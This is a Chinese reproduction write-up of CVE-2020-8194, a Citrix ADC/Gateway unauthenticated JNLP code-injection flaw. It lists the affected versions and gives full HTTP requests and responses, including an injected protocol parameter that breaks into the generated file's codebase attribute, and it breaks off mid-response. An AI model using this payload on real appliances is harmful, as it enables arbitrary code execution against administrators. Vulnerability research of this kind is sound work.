(CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞

一、漏洞简介

Citrix ADC和Citrix NetScaler Gateway存在一个代码注入漏洞。未经身份验证的远程攻击者可以利用它来创建恶意文件,如果该恶意文件由管理网络上的受害者执行,则可以允许攻击者在该用户的上下文中执行任意代码。

二、漏洞影响

Citrix ADC and Citrix Gateway: \< 13.0-58.30

Citrix ADC and NetScaler Gateway: \< 12.1-57.18

Citrix ADC and NetScaler Gateway: \< 12.0-63.21

Citrix ADC and NetScaler Gateway: \< 11.1-64.14 

NetScaler ADC and NetScaler Gateway: \< 10.5-70.18

Citrix SD-WAN WANOP: \< 11.1.1a

Citrix SD-WAN WANOP: \< 11.0.3d

Citrix SD-WAN WANOP: \< 10.2.7

Citrix Gateway Plug-in for Linux: \<  1.0.0.137

三、复现过程

通过URL来生成Java Web Start文件,此URL不需要身份验证:

GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1

此时Citrix会为用户返回一个生成的文件,且该文件会被允许连接到Citrix设备之中

HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

<jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4">

<information>
<title>GUI citrix.local</title>
<vendor>Citrix Systems, Inc.</vendor>
<homepage href="help/im/help.htm"/>
<description>Configuration Utility - Web Start Client</description>
<icon href="admin_ui/common/images/guiicon.gif"/>
<shortcut online="true">
<desktop/>
</shortcut>
</information>

<security>
<all-permissions/>
</security>

<resources>
<j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" />
<jar href="/admin_ui/php/application/views/applets/gui.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_images.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/>
<jar href="/admin_ui/php/application/views/applets/guicommon.jar"/>
<jar href="/admin_ui/php/application/views/applets/ns.jar"/>
<jar href="/admin_ui/php/application/views/applets/jnlp.jar"/>
<jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/>
<jar href="/admin_ui/php/application/views/applets/sslava.jar"/>
<jar href="/admin_ui/php/application/views/applets/pixl.jar"/>
<jar href="/admin_ui/php/application/views/applets/looks.jar"/>
<jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/>
<jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/>
<jar href="/admin_ui/php/application/views/applets/java40.jar"/>
<jar href="/admin_ui/php/application/views/applets/prefuse.jar"/>
<jar href="/admin_ui/php/application/views/applets/gson.jar"/>
</resources>

<application-desc main-class="ns.im.Gui">
<argument>-D</argument>
<argument>0</argument>
<argument>-WS</argument>
<argument>0</argument>
<argument>-codebase</argument>
<argument>2://citrix.local</argument>
<argument>-ns4</argument>
<argument>1</argument>
<argument>-ns10</argument><argument>4</argument></application-desc>
</jnlp>

如上所示,用户输入的代码,会直接反馈在输出中,那我们就可以尝试一下执行恶意代码

GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org

返回值

HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

<jnlp codebase="wiki.0-sec.org">://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo">

<information>
<title>GUI citrix.local</title>
<vendor>Citrix Systems, Inc.</vendor>